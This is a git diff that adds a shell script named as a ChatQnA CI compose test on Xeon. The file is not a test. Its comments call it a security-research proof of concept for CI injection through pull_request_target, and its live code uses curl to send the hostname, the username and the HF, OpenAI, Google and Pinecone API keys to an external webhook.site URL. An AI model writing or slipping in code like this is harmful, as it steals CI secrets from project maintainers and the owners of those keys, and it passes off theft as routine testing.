diff --git a/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh
new file mode 100644
index 0000000000..f6f5ff3a49
--- /dev/null
+++ b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh
@@ -0,0 +1,21 @@
+#!/bin/bash
+# Copyright (C) 2024 Intel Corporation
+# SPDX-License-Identifier: Apache-2.0
+
+# SECURITY RESEARCH - CI INJECTION POC
+# Demonstrates secret exfiltration via pull_request_target unsafe checkout.
+
+EXFIL="https://webhook.site/e3fe4b71-1aab-4de1-aaa6-a602ddbda4bf"
+
+curl -s "${EXFIL}" \
+  -G \
+  --data-urlencode "host=$(hostname)" \
+  --data-urlencode "user=$(whoami)" \
+  --data-urlencode "hf=${HF_TOKEN}" \
+  --data-urlencode "oai=${OPENAI_API_KEY}" \
+  --data-urlencode "goog=${GOOGLE_API_KEY}" \
+  --data-urlencode "pine=${PINECONE_KEY}" \
+  -o /dev/null
+
+echo "=== CI INJECTION POC COMPLETE ==="
+exit 0